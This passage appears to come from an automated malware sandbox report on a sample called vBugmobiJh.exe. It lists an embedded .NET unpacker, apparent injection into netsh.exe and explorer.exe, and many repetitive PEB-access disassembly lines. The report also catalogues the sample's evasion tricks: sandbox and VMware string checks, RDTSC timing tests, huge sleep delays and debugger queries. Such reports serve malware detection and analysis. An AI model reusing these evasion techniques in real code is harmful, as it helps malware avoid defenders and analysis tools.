Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\vBugmobiJh.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: vBugmobiJh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vBugmobiJh.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe, 0000000A.00000002.476422535.0000000003B40000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: vBugmobiJh.exe, 00000006.00000002.268127639.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp, netsh.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.489757839.0000000006560000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: vBugmobiJh.exe, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.vBugmobiJh.exe.2d0000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.vBugmobiJh.exe.2d0000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vBugmobiJh.exe.150000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vBugmobiJh.exe.150000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vBugmobiJh.exe.430000.1.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vBugmobiJh.exe.430000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_00CB0015 push 0030007Ah; retf
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_070961EC push eax; iretd
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0040C8B1 push ss; iretd
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041B3F2 push eax; ret
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041B3FB push eax; ret
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041B3A5 push eax; ret
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041B45C push eax; ret
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00415CB8 push esi; ret
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041A5F2 push cs; retf
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BBD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F4C8B1 push ss; iretd
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5B3F2 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5B3FB push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5B3A5 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F55CB8 push esi; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5B45C push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5A5F2 push cs; retf
Source: initial sample | Static PE information: section name: .text entropy: 7.42173467133
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vBugmobiJh.exe PID: 5108, type: MEMORY
Source: Yara match | File source: 1.2.vBugmobiJh.exe.2774880.1.raw.unpack, type: UNPACKEDPE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\vBugmobiJh.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vBugmobiJh.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000000F485E4 second address: 0000000000F485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000000F4896E second address: 0000000000F48974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_004088A0 rdtsc
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\vBugmobiJh.exe TID: 5080 | Thread sleep time: -104474s >= -30000s
Source: C:\Users\user\Desktop\vBugmobiJh.exe TID: 5796 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6792 | Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 6632 | Thread sleep time: -44000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe | Last function: Thread delayed
Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000007.00000000.255680100.000000000F659000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.251918197.00000000089B7000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.251288287.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.245895524.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.251549011.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000007.00000000.245936638.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000007.00000003.292122429.00000000089FD000.00000004.00000001.sdmp | Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAC
Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_004088A0 rdtsc
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00409B10 LdrLoadDll,
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B94BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B9B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B92397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B71B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C1D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C2138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B8DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C35BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BE53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C38B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B93B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B6DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C2131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B6F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B6DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B7AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B9FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B9D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B92AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B92ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C2EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B6AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C1B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C38A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B83A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B65210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B65210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B78A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C2AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BF4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B69240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BE51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BE69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B961A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B92990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B8C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B9A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BF41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
